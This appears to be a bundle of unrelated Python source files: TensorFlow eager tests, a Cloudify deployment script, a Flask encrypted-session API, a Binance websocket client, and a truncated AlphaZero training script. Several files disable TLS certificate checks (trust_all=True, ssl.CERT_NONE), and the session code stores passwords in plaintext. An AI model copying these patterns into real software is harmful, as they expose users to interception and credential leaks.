def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
@test_util.disable_tfrt('TFRT raises InternalError instead of NotFoundError')
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEqual(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
@test_util.run_gpu_only
def testOperationWithNoInputsRunsOnDevice(self):
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEqual(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
def testConvertMixedEagerTensorsWithVariables(self):
var = resource_variable_ops.ResourceVariable(1.0)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
['foo', var], context.context())
self.assertAllEqual([dtypes.string, dtypes.float32], types)
for t in tensors:
self.assertIsInstance(t, ops.EagerTensor)
# TODO(b/123637108): re-enable
@test_util.run_gpu_only
def disabled_testSmallIntegerOpsForcedToCPU(self):
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.int64)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op forced to CPU since all constants are integers and small.
self.assertEndsWith(c.device, 'CPU:0')
a = array_ops.zeros((8, 10), dtype=dtypes.int64)
b = array_ops.ones((8, 10), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the tensors are larger than 64 elements.
self.assertEndsWith(c.device, 'GPU:0')
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.float32)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.float32)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the constants are not integers.
self.assertEndsWith(c.device, 'GPU:0')
def testExecutionModeIsStoredThreadLocal(self):
cv = threading.Condition()
count = [0]
num_threads = 10
def execution_mode_test(cond, count, num_threads, ctx, mode):
cond.acquire()
# Ensure that all threads set their mode simultaneously
# Note that this is not a simple assignment, as the execution_mode is an
# @property with a custom setter.
ctx.execution_mode = mode
count[0] = count[0] + 1
if count[0] < num_threads:
cond.wait()
else:
cond.notify_all()
cond.release()
self.assertEqual(ctx.execution_mode, mode)
ctx = context.Context()
threads = []
for i in range(num_threads):
t = threading.Thread(
target=execution_mode_test,
args=(cv, count, num_threads, ctx,
context.SYNC if i % 2 == 0 else context.ASYNC))
t.start()
threads.append(t)
for t in threads:
t.join()
@test_util.disable_tfrt('Does not support converting DT_RESOURCE'
'to op attr type yet.')
def testEmptyResourceReturned(self):
with ops.device('CPU:0'):
v = variables.Variable(1.)
empty_handle = array_ops.gather(
v.handle[array_ops.newaxis], array_ops.zeros([0], dtype=dtypes.int32))
self.assertEqual(
[0],
empty_handle.shape.as_list())
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def setUp(self):
super(SendRecvTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
@test_util.disable_tfrt('Send/Receive not supported in TFRT yet.')
def testBasic(self):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
@test_util.run_gpu_only
@test_util.disable_tfrt('Send/Receive not supported in TFRT yet.')
def testLocalCrossDevice(self):
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = array_ops.identity(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
class EagerTensorCacheTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EagerTensorCacheTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def testCacheSkipsTensorsTooLarge(self):
cache = context._EagerTensorCache(max_items=100, max_tensor_size=3)
cache.put('1', array_ops.zeros((2, 2)))
self.assertIsNone(cache.get('1'))
cache.put('2', array_ops.zeros((2)))
self.assertIsNotNone(cache.get('2'))
if __name__ == '__main__':
test.main()
|
_a4c_create.py
|
from cloudify import ctx
from cloudify.exceptions import NonRecoverableError
from cloudify.state import ctx_parameters as inputs
import subprocess
import os
import re
import sys
import time
import threading
import platform
from StringIO import StringIO
from cloudify_rest_client import CloudifyClient
from cloudify import utils
if 'MANAGER_REST_PROTOCOL' in os.environ and os.environ['MANAGER_REST_PROTOCOL'] == "https":
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port(), protocol='https', trust_all=True)
else:
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port())
def convert_env_value_to_string(envDict):
for key, value in envDict.items():
envDict[str(key)] = str(envDict.pop(key))
def get_attribute_user(ctx):
if get_attribute(ctx, 'user'):
return get_attribute(ctx, 'user')
else:
return get_attribute(ctx, 'cloudify_agent')['user']
def get_attribute_key(ctx):
if get_attribute(ctx, 'key'):
return get_attribute(ctx, 'key')
else:
return get_attribute(ctx, 'cloudify_agent')['key']
def get_host(entity):
if entity.instance.relationships:
for relationship in entity.instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target
return None
def has_attribute_mapping(entity, attribute_name):
ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, entity.node.properties))
mapping_configuration = entity.node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def process_attribute_mapping(entity, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = entity.node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(entity, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and entity.instance.relationships:
for relationship in entity.instance.relationships:
if mapping_configuration['parameters'][1] in relationship.type_hierarchy:
return data_retriever_function(relationship.target, mapping_configuration['parameters'][2])
return ""
def get_nested_attribute(entity, attribute_names):
deep_properties = get_attribute(entity, attribute_names[0])
attribute_names_iter = iter(attribute_names)
next(attribute_names_iter)
for attribute_name in attribute_names_iter:
if deep_properties is None:
return ""
else:
deep_properties = deep_properties.get(attribute_name, None)
return deep_properties
def _all_instances_get_nested_attribute(entity, attribute_names):
return None
def get_attribute(entity, attribute_name):
if has_attribute_mapping(entity, attribute_name):
# First check if any mapping exist for attribute
mapped_value = process_attribute_mapping(entity, attribute_name, get_attribute)
ctx.logger.info('Mapping exists for attribute {0} with value {1}'.format(attribute_name, mapped_value))
return mapped_value
# No mapping exist, try to get directly the attribute from the entity
attribute_value = entity.instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
ctx.logger.info('Found the attribute {0} with value {1} on the node {2}'.format(attribute_name, attribute_value, entity.node.id))
return attribute_value
# Attribute retrieval fails, fall back to property
property_value = entity.node.properties.get(attribute_name, None)
if property_value is not None:
return property_value
# Property retrieval fails, fall back to host instance
host = get_host(entity)
if host is not None:
ctx.logger.info('Attribute not found {0} go up to the parent node {1}'.format(attribute_name, host.node.id))
return get_attribute(host, attribute_name)
# Nothing is found
return ""
def _all_instances_get_attribute(entity, attribute_name):
result_map = {}
# get all instances data using cfy rest client
# we have to get the node using the rest client with node_instance.node_id
# then we will have the relationships
node = client.nodes.get(ctx.deployment.id, entity.node.id)
all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id)
for node_instance in all_node_instances:
prop_value = __recursively_get_instance_data(node, node_instance, attribute_name)
if prop_value is not None:
ctx.logger.info('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, prop_value, entity.node.id,
node_instance.id))
result_map[node_instance.id + '_'] = prop_value
return result_map
def get_property(entity, property_name):
# Try to get the property value on the node
property_value = entity.node.properties.get(property_name, None)
if property_value is not None:
ctx.logger.info('Found the property {0} with value {1} on the node {2}'.format(property_name, property_value, entity.node.id))
return property_value
# No property found on the node, fall back to the host
host = get_host(entity)
if host is not None:
ctx.logger.info('Property not found {0} go up to the parent node {1}'.format(property_name, host.node.id))
return get_property(host, property_name)
return ""
def get_instance_list(node_id):
result = ''
all_node_instances = client.node_instances.list(ctx.deployment.id, node_id)
for node_instance in all_node_instances:
if len(result) > 0:
result += ','
result += node_instance.id
return result
def get_host_node_name(instance):
for relationship in instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target.node.id
return None
def __get_relationship(node, target_name, relationship_type):
for relationship in node.relationships:
if relationship.get('target_id') == target_name and relationship_type in relationship.get('type_hierarchy'):
return relationship
return None
def __has_attribute_mapping(node, attribute_name):
ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, node.properties))
mapping_configuration = node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def __process_attribute_mapping(node, node_instance, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(node, node_instance, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and node_instance.relationships:
for rel in node_instance.relationships:
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if mapping_configuration['parameters'][1] in relationship.get('type_hierarchy'):
target_instance = client.node_instances.get(rel.get('target_id'))
target_node = client.nodes.get(ctx.deployment.id, target_instance.node_id)
return data_retriever_function(target_node, target_instance, mapping_configuration['parameters'][2])
return None
def __recursively_get_instance_data(node, node_instance, attribute_name):
if __has_attribute_mapping(node, attribute_name):
return __process_attribute_mapping(node, node_instance, attribute_name, __recursively_get_instance_data)
attribute_value = node_instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
return attribute_value
elif node_instance.relationships:
for rel in node_instance.relationships:
# on rel we have target_name, target_id (instanceId), type
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if 'cloudify.relationships.contained_in' in relationship.get('type_hierarchy'):
parent_instance = client.node_instances.get(rel.get('target_id'))
parent_node = client.nodes.get(ctx.deployment.id, parent_instance.node_id)
return __recursively_get_instance_data(parent_node, parent_instance, attribute_name)
return None
else:
return None
env_map = {}
env_map['NODE'] = ctx.node.id
env_map['INSTANCE'] = ctx.instance.id
env_map['INSTANCES'] = get_instance_list(ctx.node.id)
env_map['HOST'] = get_host_node_name(ctx.instance)
env_map['A4C_EXECUTION_HOST'] = get_attribute(ctx, 'ip_address')
env_map['A4C_EXECUTION_USER'] = get_attribute_user(ctx)
env_map['A4C_EXECUTION_KEY'] = get_attribute_key(ctx)
if inputs.get('process', None) is not None and inputs['process'].get('env', None) is not None:
ctx.logger.info('Operation is executed with environment variable {0}'.format(inputs['process']['env']))
env_map.update(inputs['process']['env'])
def parse_output(output):
# by convention, the last output is the result of the operation
last_output = None
outputs = {}
pattern = re.compile('EXPECTED_OUTPUT_(\w+)=(.*)')
for line in output.splitlines():
match = pattern.match(line)
if match is None:
last_output = line
else:
output_name = match.group(1)
output_value = match.group(2)
outputs[output_name] = output_value
return {'last_output': last_output, 'outputs': outputs}
def execute(script_path, process, outputNames, command_prefix=None, cwd=None):
os.chmod(script_path, 0755)
on_posix = 'posix' in sys.builtin_module_names
env = os.environ.copy()
process_env = process.get('env', {})
env.update(process_env)
if outputNames is not None:
env['EXPECTED_OUTPUTS'] = outputNames
if platform.system() == 'Windows':
wrapper_path = ctx.download_resource("scriptWrapper.bat")
else:
wrapper_path = ctx.download_resource("scriptWrapper.sh")
os.chmod(wrapper_path, 0755)
command = '{0} {1}'.format(wrapper_path, script_path)
else:
command = script_path
if command_prefix is not None:
command = "{0} {1}".format(command_prefix, command)
ctx.logger.info('Executing: {0} in env {1}'.format(command, env))
process = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
cwd=cwd,
bufsize=1,
close_fds=on_posix)
return_code = None
stdout_consumer = OutputConsumer(process.stdout)
stderr_consumer = OutputConsumer(process.stderr)
while True:
return_code = process.poll()
if return_code is not None:
break
time.sleep(0.1)
stdout_consumer.join()
stderr_consumer.join()
parsed_output = parse_output(stdout_consumer.buffer.getvalue())
if outputNames is not None:
outputNameList = outputNames.split(';')
for outputName in outputNameList:
ctx.logger.info('Ouput name: {0} value : {1}'.format(outputName, parsed_output['outputs'].get(outputName, None)))
if return_code != 0:
error_message = "Script {0} encountered error with return code {1} and standard output {2}, error output {3}".format(command, return_code,
stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
error_message = str(unicode(error_message, errors='ignore'))
ctx.logger.error(error_message)
raise NonRecoverableError(error_message)
else:
ok_message = "Script {0} executed normally with standard output {1} and error output {2}".format(command, stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
ok_message = str(unicode(ok_message, errors='ignore'))
ctx.logger.info(ok_message)
return parsed_output
class OutputConsumer(object):
def __init__(self, out):
self.out = out
self.buffer = StringIO()
self.consumer = threading.Thread(target=self.consume_output)
self.consumer.daemon = True
self.consumer.start()
def consume_output(self):
for line in iter(self.out.readline, b''):
self.buffer.write(line)
self.out.close()
def join(self):
self.consumer.join()
new_script_process = {'env': env_map}
operationOutputNames = None
convert_env_value_to_string(new_script_process['env'])
parsed_output = execute(ctx.download_resource('_a4c_impl_artifact/PHP/tosca.interfaces.node.lifecycle.Standard/create/install_php.sh'), new_script_process, operationOutputNames)
outputs = parsed_output['outputs'].items()
for k,v in outputs:
ctx.logger.info('Output name: {0} value: {1}'.format(k, v))
ctx.instance.runtime_properties['_a4c_OO:tosca.interfaces.node.lifecycle.Standard:create:{0}'.format(k)] = v
ctx.instance.update()
|
session.py
|
import os
import json
import time
import logging
from threading import Lock, Timer
from uuid import uuid4
from multiprocessing import Process, Event
from flask import Blueprint, request
from .error import SessionNotInitialized, FileIsBeingEncrypted, FileIsBeingDecrypted, SessionExists
from .encrypter import FileEncrypter
from .util import *
MAX_SESSION_TIME = 60 * 60 # 1 hour
CHECK_INTERVAL = 60 * 10 # 10 minutes
bp = Blueprint('session', __name__, url_prefix='/api/session')
sessions = {}
sessions_lock = Lock()
def get_session(session_name):
with sessions_lock:
session = sessions.get(session_name, None)
if not session:
raise SessionNotInitialized
return session
def get_encrypt_job(session, file_id):
with session['lock']:
return session['encrypt_jobs'].get(file_id, None)
def add_encrypt_job(session, file_id, input_path, output_path):
encrypt_job = get_encrypt_job(session, file_id)
with session['lock']:
if encrypt_job:
encrypt_job[1].join()
event = Event()
def encrypt_file_wrapper():
try:
session['file_encrypter'].encrypt_file(input_path, output_path)
except Exception as e:
logging.error('failed to encrypt')
logging.error(e)
finally:
event.set()
os.remove(input_path)
encrypt_proc = Process(target=encrypt_file_wrapper)
encrypt_proc.start()
session['encrypt_jobs'][file_id] = (event, encrypt_proc)
def get_decrypt_job(session, file_id):
with session['lock']:
return session['decrypt_jobs'].get(file_id, None)
def add_decrypt_job(session, file_id, input_path, output_path):
decrypt_job = get_decrypt_job(session, file_id)
with session['lock']:
if decrypt_job:
decrypt_job[1].join()
event = Event()
def decrypt_file_wrapper():
try:
session['file_encrypter'].decrypt_file(input_path, output_path)
except Exception as e:
logging.error('failed to decrypt')
logging.error(e)
finally:
event.set()
decrypt_proc = Process(target=decrypt_file_wrapper)
decrypt_proc.start()
session['decrypted'].add(output_path)
session['decrypt_jobs'][file_id] = (event, decrypt_proc)
def check_file_locked(session, file_id):
encrypt_job = get_encrypt_job(session, file_id)
if encrypt_job and not encrypt_job[0].is_set():
raise FileIsBeingEncrypted
decrypt_job = get_decrypt_job(session, file_id)
if decrypt_job and not decrypt_job[0].is_set():
raise FileIsBeingDecrypted
@bp.route('', methods=['POST'])
def sessions_endpoint():
if request.method == 'POST':
request_data = json.loads(request.data)
session_name = str(request_data['name'])
session = None
try:
session = get_session(session_name)
except:
pass
if session and session['password'] == request_data['password']:
raise SessionExists
session = {
'file_encrypter': FileEncrypter(request_data['password'])
, 'name': session_name
, 'creation_time': time.time()
, 'encrypt_jobs': {}
, 'decrypt_jobs': {}
, 'decrypted': set()
, 'lock': Lock()
, 'password': request_data['password']
}
with sessions_lock:
sessions[session_name] = session
return {'status': 'success', 'session_name': session_name}, 201
@bp.route('<session_name>/refresh', methods=['PUT'])
def session_refresh_endpoint(session_name):
if request.method == 'PUT':
session = get_session(session_name)
session['creation_time'] = time.time()
logging.info('Session Refreshed, Time Left: {}'.format((MAX_SESSION_TIME / 60) - (time.time() - session['creation_time'])))
return { 'status': 'success' }, 200
@bp.route('<session_name>/valid', methods=['GET'])
def session_endpoint(session_name):
if request.method == 'GET':
session = get_session(session_name)
if not session:
return {
'active': False,
'reason': 'Session name {} not found'.format(session_name)
}, 404
if time.time() - session['creation_time'] < MAX_SESSION_TIME:
return {
'active': True,
}, 200
else:
return {
'active': False,
'reason': 'Session timed out'.format(session_name)
}, 404
def create_session_clear_timer():
session_clear_timer = Timer(CHECK_INTERVAL, _clear_invalid_sessions)
session_clear_timer.name = 'ClearSessionThread'
session_clear_timer.start()
def _clear_decrypted(session):
dir_path = get_decrypted_folder(session['name'])
for f in os.listdir(dir_path):
os.remove(os.path.join(dir_path, f))
def _clear_invalid_sessions():
global sessions
logging.info('clearing invalid sessions')
with sessions_lock:
to_delete = []
for k, session in sessions.items():
if time.time() - session['creation_time'] >= MAX_SESSION_TIME:
to_delete.append(k)
for k in to_delete:
_clear_decrypted(sessions[k])
del sessions[k]
logging.info('cleared {} sessions'.format(len(to_delete)))
create_session_clear_timer()
|
websocketconnection.py
|
import threading
import websocket
import gzip
import ssl
import logging
from urllib import parse
import urllib.parse
from common.scripts.binance_spot.impl.utils.timeservice import get_current_timestamp
from common.scripts.binance_spot.impl.utils.urlparamsbuilder import UrlParamsBuilder
from common.scripts.binance_spot.impl.utils.apisignature import create_signature
from common.scripts.binance_spot.exception.binanceapiexception import BinanceApiException
from common.scripts.binance_spot.impl.utils import *
from common.scripts.binance_spot.base.printobject import *
from common.scripts.binance_spot.model.constant import *
# Key: ws, Value: connection
websocket_connection_handler = dict()
def on_message(ws, message):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_message(message)
return
def on_error(ws, error):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_failure(error)
def on_close(ws):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_close()
def on_open(ws):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_open(ws)
connection_id = 0
class ConnectionState:
IDLE = 0
CONNECTED = 1
CLOSED_ON_ERROR = 2
def websocket_func(*args):
connection_instance = args[0]
connection_instance.ws = websocket.WebSocketApp(connection_instance.url,
on_message=on_message,
on_error=on_error,
on_close=on_close)
global websocket_connection_handler
websocket_connection_handler[connection_instance.ws] = connection_instance
connection_instance.logger.info(
'[Sub][' + str(connection_instance.id) + '] Connecting...')
connection_instance.delay_in_second = -1
connection_instance.ws.on_open = on_open
connection_instance.ws.run_forever(sslopt={'cert_reqs': ssl.CERT_NONE})
connection_instance.logger.info(
'[Sub][' + str(connection_instance.id) + '] Connection event loop down')
if connection_instance.state == ConnectionState.CONNECTED:
connection_instance.state = ConnectionState.IDLE
class WebsocketConnection:
def __init__(self, api_key, secret_key, uri, watch_dog, request):
self.__thread = None
self.url = uri
self.__api_key = api_key
self.__secret_key = secret_key
self.request = request
self.__watch_dog = watch_dog
self.delay_in_second = -1
self.ws = None
self.last_receive_time = 0
self.logger = logging.getLogger('algo-trading')
self.state = ConnectionState.IDLE
global connection_id
connection_id += 1
self.id = connection_id
def in_delay_connection(self):
return self.delay_in_second != -1
def re_connect_in_delay(self, delay_in_second):
if self.ws is not None:
self.ws.close()
self.ws = None
self.delay_in_second = delay_in_second
self.logger.warning('[Sub][' + str(self.id) + '] Reconnecting after '
+ str(self.delay_in_second) + ' seconds later')
def re_connect(self):
if self.delay_in_second != 0:
self.delay_in_second -= 1
self.logger.warning('In delay connection: ' +
str(self.delay_in_second))
else:
self.connect()
def connect(self):
if self.state == ConnectionState.CONNECTED:
self.logger.info('[Sub][' + str(self.id) + '] Already connected')
else:
self.__thread = threading.Thread(
target=websocket_func, args=[self])
self.__thread.start()
def send(self, data):
self.ws.send(data)
def close(self):
self.ws.close()
del websocket_connection_handler[self.ws]
self.__watch_dog.on_connection_closed(self)
self.logger.error('[Sub][' + str(self.id) + '] Closing normally')
def on_open(self, ws):
self.logger.info('[Sub][' + str(self.id) + '] Connected to server')
self.ws = ws
self.last_receive_time = get_current_timestamp()
self.state = ConnectionState.CONNECTED
self.__watch_dog.on_connection_created(self)
if self.request.subscription_handler is not None:
self.request.subscription_handler(self)
return
def on_error(self, error_message):
if self.request.error_handler is not None:
print('error')
exception = BinanceApiException(
BinanceApiException.SUBSCRIPTION_ERROR, error_message)
self.request.error_handler(exception)
self.logger.error('[Sub][' + str(self.id) + '] ' + str(error_message))
def on_failure(self, error):
print('on_failure')
self.on_error('Unexpected error: ' + str(error))
self.close_on_error()
def on_message(self, message):
self.last_receive_time = get_current_timestamp()
json_wrapper = parse_json_from_string(message)
if json_wrapper.contain_key('status') and json_wrapper.get_string('status') != 'ok':
error_code = json_wrapper.get_string_or_default(
'err-code', 'Unknown error')
error_msg = json_wrapper.get_string_or_default(
'err-msg', 'Unknown error')
self.on_error(error_code + ': ' + error_msg)
elif json_wrapper.contain_key('err-code') and json_wrapper.get_int('err-code') != 0:
error_code = json_wrapper.get_string_or_default(
'err-code', 'Unknown error')
error_msg = json_wrapper.get_string_or_default(
'err-msg', 'Unknown error')
self.on_error(error_code + ': ' + error_msg)
elif json_wrapper.contain_key('result') and json_wrapper.contain_key('id'):
self.__on_receive_response(json_wrapper)
else:
self.__on_receive_payload(json_wrapper)
def __on_receive_response(self, json_wrapper):
res = None
try:
res = json_wrapper.get_int('id')
except Exception as e:
self.on_error('Failed to parse servers response: ' + str(e))
try:
if self.request.update_callback is not None:
self.request.update_callback(
SubscribeMessageType.RESPONSE, res)
except Exception as e:
self.on_error('Process error: ' + str(e)
+ ' You should capture the exception in your error handler')
def __on_receive_payload(self, json_wrapper):
res = None
try:
if self.request.json_parser is not None:
res = self.request.json_parser(json_wrapper)
except Exception as e:
self.on_error('Failed to parse servers response: ' + str(e))
try:
if self.request.update_callback is not None:
self.request.update_callback(SubscribeMessageType.PAYLOAD, res)
except Exception as e:
self.on_error('Process error: ' + str(e)
+ ' You should capture the exception in your error handler')
if self.request.auto_close:
self.close()
def __process_ping_on_trading_line(self, ping_ts):
self.send('{\'op\':\'pong\',\'ts\':' + str(ping_ts) + '}')
return
def __process_ping_on_market_line(self, ping_ts):
self.send('{\'pong\':' + str(ping_ts) + '}')
return
def close_on_error(self):
if self.ws is not None:
self.ws.close()
self.state = ConnectionState.CLOSED_ON_ERROR
self.logger.error(
'[Sub][' + str(self.id) + '] Connection is closing due to error')
|
train_multi_2.0.py
|
#!/search/odin/liyaozong/tools/python3/bin/python3
# coding: utf8
import random
import numpy as np
from collections import defaultdict, deque
from game import Board, Game
from mcts_pure import MCTSPlayer as MCTS_Pure
from mcts_alphaZero import MCTSPlayer
import multiprocessing
from multiprocessing import Manager, Pool
import time
import logging
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
model_dir='multi_2'
log_name = model_dir + '/logs'
current_model_name = model_dir + '/current_policy_model'
temp_current_model_name = model_dir + '/temp_current_policy_model'
best_model_name = model_dir + '/best_policy_model'
# log 配置
logging.basicConfig(filename=log_name, level=logging.INFO, format="[%(levelname)s]\t%(asctime)s\tLINENO:%(lineno)d\t%(message)s", datefmt="%Y-%m-%d %H:%M:%S")
class TrainPipeline():
def __init__(self, init_model=None):
# params of the board and the game
self.board_width = 8
self.board_height = 8
self.n_in_row = 5
# training params
self.learn_rate = 2e-3
self.temp = 1.0 # the temperature param
self.n_playout = 400 # num of simulations for each move
self.c_puct = 5
self.batch_size = 512 # mini-batch size for training
self.buffer_num = self.batch_size * 100
self.play_batch_size = 1
self.epochs = 5 # num of train_steps for each update
self.kl_targ = 0.02
self.check_freq = 1000
self.update_freq = 300
self.game_batch_num = 1000000000
self.process_num = 12
self.summary_record_freq = 5
# num of simulations used for the pure mcts, which is used as
# the opponent to evaluate the trained policy
self.main_process_wait_time = 300
def collect_selfplay_data_thread(self, thread_id, shared_queue, net_lock, data_lock):
os.environ["CUDA_VISIBLE_DEVICES"] = str(thread_id % 6 + 2)
def local_thread_func(thread_id, shared_queue, net_lock, data_lock):
from policy_value_net_tensorflow import PolicyValueNet
# 读取模型文件,加锁
logging.info("selfplay process {} ask net lock".format(thread_id))
with net_lock:
logging.info('selfpaly process {} get net lock'.format(thread_id))
current_policy = PolicyValueNet(self.board_width, self.board_height, model_file=current_model_name)
logging.info('selfplay process {} release net lock'.format(thread_id))
local_board = Board(width=self.board_width,
height=self.board_height,
n_in_row=self.n_in_row)
local_game = Game(local_board)
local_mcts_player = MCTSPlayer(current_policy.policy_value_fn,
c_puct=self.c_puct,
n_playout=self.n_playout,
is_selfplay=1)
logging.info("selfplay process {} start {}th selfplay".format(thread_id, index))
winner, play_data = local_game.start_self_play(local_mcts_player,
temp=self.temp)
logging.info("selfplay process {} finish {}th selfplay".format(thread_id, index))
play_data = list(play_data)
play_data = self.get_equi_data(play_data)
# 添加对弈数据,加锁
logging.info('selfplay process {} ask date lock'.format(thread_id))
with data_lock:
logging.info('selfplay process {} get date lock'.format(thread_id))
shared_queue.extend(play_data)
while len(shared_queue) > self.buffer_num:
shared_queue.pop(0)
logging.info('selfplay process {} release data lock'.format(thread_id))
logging.info('selfplay process {} all selfpaly start'.format(thread_id))
for index in range(self.game_batch_num):
pro = multiprocessing.Process(target=local_thread_func, args=(thread_id, shared_queue, net_lock, data_lock))
pro.start()
pro.join()
logging.info('selfplay process {} all selfpaly finished'.format(thread_id))
def get_equi_data(self, play_data):
"""augment the data set by rotation and flipping
play_data: [(state, mcts_prob, winner_z), ..., ...]
"""
extend_data = []
for state, mcts_porb, winner in play_data:
for i in [1, 2, 3, 4]:
# rotate counterclockwise
equi_state = np.array([np.rot90(s, i) for s in state])
equi_mcts_prob = np.rot90(np.flipud(
mcts_porb.reshape(self.board_height, self.board_width)), i)
extend_data.append((equi_state,
np.flipud(equi_mcts_prob).flatten(),
winner))
# flip horizontally
equi_state = np.array([np.fliplr(s) for s in equi_state])
equi_mcts_prob = np.fliplr(equi_mcts_prob)
extend_data.append((equi_state,
np.flipud(equi_mcts_prob).flatten(),
winner))
return extend_data
def policy_update(self, current_policy_value_net, shared_queue, net_lock, data_lock, index, lr_multiplier):
"""update the policy-value net"""
with data_lock:
